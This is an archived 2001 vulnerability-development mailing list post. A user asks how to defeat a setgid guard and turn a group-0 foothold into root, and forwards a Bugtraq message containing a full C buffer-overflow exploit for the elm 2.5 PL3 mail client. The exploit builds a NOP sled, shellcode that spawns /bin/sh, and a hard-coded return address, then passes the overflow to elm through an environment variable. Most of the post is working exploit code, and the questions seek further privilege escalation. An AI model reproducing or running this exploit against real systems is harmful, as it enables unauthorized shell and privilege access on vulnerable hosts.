Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

FW: elm 2.5 PL3 exploit

From: "Rasta C. Shell" <rasta () RSHELL ORG>
Date: Wed, 14 Feb 2001 15:48:01 +0200
You might saw this on bugtraq. If we still on the subject of elm and such,
I have tried my own exploit on the elm setgid binary. I was able to
exploit it but due to a SETGID(getgroup) in syscall.c, was not able
to gain root gid (my shellcode had a setregid() call and i also try setegid
call (setregid(-1,gid)).
Is there a way to overcome that?

Further more, how good (uid=0) can come up from a gid=0, when the system file
permission is reasonably safe. i.e. /etc/passwd is mode 644, ~root is 755, etc.


-rasta


----- Forwarded message from kiss <NIKEBOY () RETEMAIL ES> -----

From: kiss <NIKEBOY () RETEMAIL ES>
Subject:      elm 2.5 PL3 exploit
To: BUGTRAQ () SECURITYFOCUS COM

this is a just a proof of concept, i haven't included setgid call in the
shellcode:

/***
    -------------
    elm253-exploit.c
    -------------
***/

#include <stdlib.h>

#define NOP 0x90
#define LEN 356
#define OFFSET 0
#define RET 0xbffffa64

unsigned long dame_sp() {
        __asm__("movl %esp,%eax");
}

void main() {

        static char shellcode[]=
/* "\x31\xc0"   */              /* xorl %eax,%eax        */
/* "\x31\xdb"   */              /* xorl %ebx,%ebx        */
/* "\xb0\x17"   */              /* movb $0x17,%al        */
/* "\xcd\x80"   */              /* int $0x80             */
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

        int i=0;
        int cont=0;
        char buffer[LEN+4];
        char kid[6+LEN+4];

        printf("-------------------------------------\n");
        printf("elm buffer overflow exploit by _kiss_\n");
        printf("-------------------------------------\n");

        for (i=0;i<=LEN;i+=4)
                *(long *) &buffer[i] = RET;

        for (i=0;i<LEN-strlen(shellcode)-100;i++)
                buffer[i]=NOP;

        for (i=LEN-strlen(shellcode)-100;i<LEN-100;i++)
                buffer[i]=shellcode[cont++];

        strcpy(kid,"KID=");
        strcat(kid,buffer);
        putenv(kid);
        system("/usr/local/bin/elm -f $KID");
}


solution is simple: upgrade ;)

                                                        _kiss_

----- End forwarded message -----

--
http://www.rshell.org
Join #shellcode on EFnet.
rasta () rshell org
Previous By Date Next
Previous By Thread Next

Current thread: